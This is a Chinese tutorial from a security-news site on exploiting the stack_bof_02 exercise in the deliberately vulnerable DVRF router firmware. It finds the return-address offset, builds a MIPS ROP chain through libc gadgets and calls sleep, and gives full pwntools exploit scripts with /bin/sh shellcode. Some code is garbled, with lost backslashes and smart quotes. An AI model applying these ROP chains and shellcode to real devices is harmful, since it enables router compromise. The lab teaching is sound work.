频道栏目
首页 > 资讯 > 网站安全 > 正文

路由器漏洞挖掘之栈溢出入门(三)ROP链的构造

19-03-08        来源:[db:作者]  
收藏   我要投稿
DVRF 的第二个栈溢出程序是 stack_bof_2,这题和上一道题的差异就在于这道题没有给我们后门函数,需要自己构造 shellcode 来进行调用。

README 文件里也做了说明,所以这里的重点是 ROP 链的构造以及 sleep(1) 的用法。

确定偏移

和上一道题一样,首先我们需要确定 ra 的偏移。

使用 patternLocOffset.py 生成 500 个长度的 pattern(或者使用 pwntools 里的自带的工具 cyclic),并开启 gdb 调试端口

nick@nick-machine:~/iot/DVRF/Firmware/_DVRF_v03.bin.extracted/squashfs-root$ python ../../../../tools/patternLocOffset.py -c -l 500 -f ./pattern

[*] Create pattern string contains 500 characters ok!

[+] output to ./pattern ok!

[+] take time: 0.0106 s

nick@nick-machine:~/iot/DVRF/Firmware/_DVRF_v03.bin.extracted/squashfs-root$ ./qemu-mipsel -g 23946 -L ./ ./pwnable/ShellCode_Required/stack_bof_02 "`cat ./pattern`"

在 0x400928 处下断点,得到此时 ra 寄存器的值是 0x72413971

python ../../../../tools/patternLocOffset.py -s 0x72413971 -l 500

这里得到偏移是 508 个字节。

ROP 构造详解

这里溢出到 $ra 寄存器需要 508 个字节,后面的四个字节就是需要构造的 ROP 的地址。

调用 sleep(1) 函数

之所以要调用 sleep 函数的原因,

调用 sleep 函数的前提是先布置好他的参数 $a0 = 1。

所以这里我们先在 libc 中搜索一下将参数 1 赋值给 $a0 寄存器的 gadget: "li $a0,1"

gadget 的末尾是:

jr $s1

所以在原来覆盖栈数据时候就要求我们能够覆盖 $s1 寄存器,以达到跳转到下一个 gadget 的目的。

但是在 main 函数的汇编语句的末尾,没有找到类似 lw $s0,0x123($sp) 这样的汇编语句,所以我们无法控制 $s1 寄存器

所以这里我们需要先找到一个将栈上的数据传递给 $s1 寄存器的 gadget

这里使用 mipsrop.tail() 来搜索 gadget

找到的都不太能够满足我们的要求,这里根据下面这篇文章,找到一个特别不错的 gadget。也就是上图中 scandir 函数的结尾的部分

https://xz.aliyun.com/t/1511

跳转到 0xAFE0 之后,我们就可以继续在原来的栈上布置下一步的 gadget 了。

在此之前我们还需要和上一篇的方法一样,在 gdb 调试中找到 libc 的基地址。(vmmap 或者 i proc mappings)

使用 pwntools 工具生成填充文件

from pwn import *

libc_addr = 0x766e5000

payload = 'a' * 508

payload += p32(libc_addr + 0x0000Afe0)

with open('stack2_fill','wb') as f:

f.write(payload)

print("OKn")

开启 gdb 调试:

./qemu-mipsel -g 23946 -L ./ ./pwnable/ShellCode_Required/stack_bof_02 "`cat ./stack2_fill`"

还是断在 0x400928 处

单步,可见我们需要布置的下一个 gadget 的位置在 $sp+0x3c (ra 寄存器位置)

根据调试,我们需要在原来的 payload 后面 padding 0x3c 个字节才能控制 ra 寄存器

libc_addr = 0x766e5000

payload = 'a' * 508

payload += p32(libc_addr + 0x0000Afe0) # jr $ra

payload += 'b' * 0x3c # padding

payload += 'c' * 4 # ra

在这填充的 0x3c 个字节中,我们对于 s0 – fp 寄存器的值都是可控的,那么接下来就好办了。在这 0x3c 个字节中,拆分填充成这几个寄存器的值就行了。

我们还是采用上面那个 0x0002FB10 地址的 gadget ,ra 设置为这个地址,那么这里的 s1 寄存器的值就需要填充为下一个 gadget 的地址

这里不能直接填充为 sleep 函数的地址,因为我们这里没办法控制 ra 寄存器。如果直接调用 sleep 函数的话就没办法返回了。所以需要找到一个既可以调用 sleep 函数又可以控制 ra 寄存器的 gadget

mipsrop.find("move $t9,$s3")

找到 0x00021C34 这个地址的 gadget

这里的 s3 寄存器就填充为 sleep 函数地址,调用完成之后继续返回到这个 gadget 的 jr $ra。

这里的 ra 寄存器的值就填充为下一个 gadget 的地址

这时的 payload:

from pwn import *

context.endian = 'little'

context.arch = 'mips'

libc_addr = 0x766e5000

sleep_offset = 0x0002F2B0

payload = 'a' * 508

payload += p32(libc_addr + 0xAfe0) # jr $ra

payload += 'b' * (0x3c - 4 * 9)

payload += 'a' * 4 # s0

payload += p32(libc_addr + 0x21C34) # s1

payload += 'a' * 4 # s2

payload += p32(libc_addr + sleep_offset) # s3

payload += 'a' * 4 # s4

payload += 'a' * 4 # s5

payload += 'a' * 4 # s6

payload += 'a' * 4 # s7

payload += 'a' * 4 # fp

payload += p32(libc_addr + 0x2FB10) # ra

#---------------stack 2 (0x21C34)-------------------

payload += 'c' * 0x2c

payload += p32(next_gadget_addr)

调用 shellcode

继续下一步的 gadget 的调用,我们这次使用 mipsrop.stackfinder() 找到 0x000171CC 这一处的 gadget。

这里的 $a0 寄存器是从栈上来取值,我们就可以向 $a0 对应的位置填充我们的 shellcode。这里的 $s3 就需要在前一步的 gadget 中实现填充为类似 jr $a0 的 gadget

再次进行搜索,找到一处:

Python>mipsrop.find("move $t9, $a0")

----------------------------------------------------------------------------------------------------------------

| Address | Action | Control Jump |

----------------------------------------------------------------------------------------------------------------

| 0x000214A0 | move $t9,$a0 | jalr $a0 |

----------------------------------------------------------------------------------------------------------------

正好可以满足我们的条件。

因此在第二个栈的 payload 为:

payload += 'c' * 0x24

payload += p32(libc_addr + 0x000214A0) # s3

payload += 'd' * 4 # s4

payload += p32(libc_addr + 0x171CC) # ra

#payload += p32(libc_addr + 0x000214A0) # s3

#payload += 'd' * 4

payload += 'd' * 0x18 # shellcode

payload += shellcode

在 MIPS 指令集中,0x20 和 0x00 都是坏字节。因此要注意 gadget 的地址不能包含这两个值

在这里找到可用的 shellcode,往栈上填充就行了。

shellcode += "xffxffx06x28" # slti $a2, $zero, -1

shellcode += "x62x69x0fx3c" # lui $t7, 0x6962

shellcode += "x2fx2fxefx35" # ori $t7, $t7, 0x2f2f

shellcode += "xf4xffxafxaf" # sw $t7, -0xc($sp)

shellcode += "x73x68x0ex3c" # lui $t6, 0x6873

shellcode += "x6ex2fxcex35" # ori $t6, $t6, 0x2f6e

shellcode += "xf8xffxaexaf" # sw $t6, -8($sp)

shellcode += "xfcxffxa0xaf" # sw $zero, -4($sp)

shellcode += "xf4xffxa4x27" # addiu $a0, $sp, -0xc

shellcode += "xffxffx05x28" # slti $a1, $zero, -1

shellcode += "xabx0fx02x24" # addiu;$v0, $zero, 0xfab

shellcode += "x0cx01x01x01" # syscall 0x40404

在 gdb 中调试的效果是:

所以最后的 exp:

from pwn import *

context.endian = 'little'

context.arch = 'mips'

payload += "xffxffx06x28" # slti $a2, $zero, -1

payload += "x62x69x0fx3c" # lui $t7, 0x6962

payload += "x2fx2fxefx35" # ori $t7, $t7, 0x2f2f

payload += "xf4xffxafxaf" # sw $t7, -0xc($sp)

payload += "x73x68x0ex3c" # lui $t6, 0x6873

payload += "x6ex2fxcex35" # ori $t6, $t6, 0x2f6e

payload += "xf8xffxaexaf" # sw $t6, -8($sp)

payload += "xfcxffxa0xaf" # sw $zero, -4($sp)

payload += "xf4xffxa4x27" # addiu $a0, $sp, -0xc

payload += "xffxffx05x28" # slti $a1, $zero, -1

payload += "xabx0fx02x24" # addiu;$v0, $zero, 0xfab

payload += "x0cx01x01x01" # syscall 0x40404

shellcode = payload

libc_addr = 0x766e5000

sleep_offset = 0x0002F2B0

payload = 'a' * 508

payload += p32(libc_addr + 0xAfe0) # jr $ra

payload += 'b' * (0x3c - 4 * 9)

payload += 'a' * 4 # s0

payload += p32(libc_addr + 0x21C34) # s1

payload += 'a' * 4 # s2

payload += p32(libc_addr + sleep_offset) # s3

payload += 'a' * 4 # s4

payload += 'a' * 4 # s5

payload += 'a' * 4 # s6

payload += 'a' * 4 # s7

payload += 'a' * 4 # fp

payload += p32(libc_addr + 0x2FB10) # ra

#---------------stack 2 (0x21C34)-------------------

payload += 'c' * 0x24

payload += p32(libc_addr + 0x000214A0) # s3

payload += 'd' * 4 # s4

payload += p32(libc_addr + 0x171CC) # ra

#payload += p32(libc_addr + 0x000214A0) # s3

#payload += 'd' * 4

payload += 'f' * 0x18 # shellcode

payload += shellcode

with open('stack2_fill','wb') as f:

f.write(payload)

重新加载一下程序就可以 getshell

./qemu-mipsel -L ./ ./pwnable/ShellCode_Required/stack_bof_02 "`cat ./stack2_fill`"

如果上面的 exp 用不了的话,也可以试试这个:

from pwn import *

context.endian = ‘little’

context.arch = ‘mips’

libc_addr = 0x766e5000

sleep_offset = 0x0002F2B0

sleep_end_addr = 0x767144c8

shellcode = “”

shellcode += “xffxffx06x28” # slti $a2, $zero, -1

shellcode += “x62x69x0fx3c” # lui $t7, 0x6962

shellcode += “x2fx2fxefx35” # ori $t7, $t7, 0x2f2f

shellcode += “xf4xffxafxaf” # sw $t7, -0xc($sp)

shellcode += “x73x68x0ex3c” # lui $t6, 0x6873

shellcode += “x6ex2fxcex35” # ori $t6, $t6, 0x2f6e

shellcode += “xf8xffxaexaf” # sw $t6, -8($sp)

shellcode += “xfcxffxa0xaf” # sw $zero, -4($sp)

shellcode += “xf4xffxa4x27” # addiu $a0, $sp, -0xc

shellcode += “xffxffx05x28” # slti $a1, $zero, -1

shellcode += “xabx0fx02x24” # addiu;$v0, $zero, 0xfab

shellcode += “x0cx01x01x01” # syscall 0x40404

payload = ‘a’ * 508

payload += p32(libc_addr + 0xAfe0) # jr $ra

payload += ‘b’ (0x3c - 4 9)

payload += ‘a’ 4 # s0

payload += p32(libc_addr + 0x21C34) # s1

payload += ‘a’ 4 # s2

payload += p32(libc_addr + sleep_offset) # s3

payload += ‘a’ 4 # s4

payload += ‘a’ 4 # s5

payload += ‘a’ 4 # s6

payload += ‘a’ 4 # s7

payload += ‘a’ * 4 # fp

payload += p32(libc_addr + 0x2FB10) # ra

———————-stack 2—————————-

payload += ‘c’ 0x24

payload += p32(libc_addr + 0x000214A0) # s3

payload += ‘d’ 4 # s4

payload += p32(libc_addr + 0xAfe0) # ra

———————-stack 3—————————-

payload += ‘a’ (0x3c-49)

payload += p32(libc_addr + 0x000214A0) # s0

payload += ‘a’ 4 # s1

payload += ‘a’ 4 # s2

payload += ‘a’ 4 # s3

payload += ‘a’ 4 # s4

payload += ‘a’ 4 # s5

payload += ‘a’ 4 # s6

payload += ‘a’ 4 # s7

payload += ‘a’ 4 # fp

payload += p32(libc_addr + 0x0001B230) # ra

payload += ‘f’ * 0x28

payload += shellcode

with open(‘stack2_fill’,’wb’) as f:

f.write(payload)

print(“OKn”)

总结

个人认为构造 gadget 的要点是要思路要清晰,对栈的布局要有一个清楚的了解。还有就是需要熟悉 mipsrop 工具的使用。多动手调试,多踩坑才会长经验。

相关TAG标签
上一篇:测试IE/EDGE崩溃漏洞的可利用性
下一篇:新发现的 thunderclap 漏洞允许黑客使用 Thunderbolt/USB-C 外设攻击PC
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站